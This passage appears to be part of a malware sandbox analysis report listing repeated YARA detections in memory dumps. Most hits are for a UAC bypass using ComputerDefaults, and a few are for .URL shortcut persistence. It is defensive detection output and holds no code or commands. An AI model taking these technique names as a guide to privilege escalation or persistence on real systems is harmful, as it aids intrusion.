00000000.00000003.278134092.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274633708.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269096338.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294878519.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293057443.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278699441.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296236698.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269819505.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301893680.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302562172.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270208196.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295648212.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275918795.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278821208.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294376576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293127537.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274925968.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.291300073.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.284795356.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300706902.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275648205.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267280991.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298501218.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268454680.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268036798.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274340049.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296629766.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277710973.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273306888.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304168705.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302256807.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302380410.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300116040.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272017819.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278336854.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289593038.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275280429.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270497261.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289906242.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270586972.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.285220839.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276747566.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299947304.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299710664.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272274791.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278878279.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299404033.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289845011.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299887936.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.282169051.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.297355735.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267788420.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.292710679.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281789547.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277207097.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269360363.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276357483.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.297196068.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.285356630.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.269247158.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269247158.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303320676.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270827759.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.269656694.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269656694.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289186119.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269793880.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281293610.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275700666.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.292509926.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267824536.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296064056.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.270196643.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270196643.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.291089725.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301977765.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279293289.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.282607009.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299175953.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272685807.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267879181.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267149872.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275034585.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303212831.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272883253.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300409976.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267121378.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272052467.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277383343.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274014122.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269670819.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300208753.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273082890.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304480632.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.266968052.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295078811.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.280580709.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278502950.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273413935.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272177050.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304717911.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268826659.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296798187.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290532021.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267617084.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267512236.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271617241.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290690957.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.288186345.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269018783.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279088805.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300831643.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301190667.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.270287811.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270287811.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274688519.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267583195.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290876746.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268880199.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267729471.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269002994.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296561628.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272377173.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299315397.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296299055.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302498405.0000000004EAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296906020.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.291757768.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.297756014.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295688230.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269270632.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301535117.0000000004EAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270531434.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271456345.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296494808.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276611424.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.292407624.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295939978.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290391147.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276151705.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294091237.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
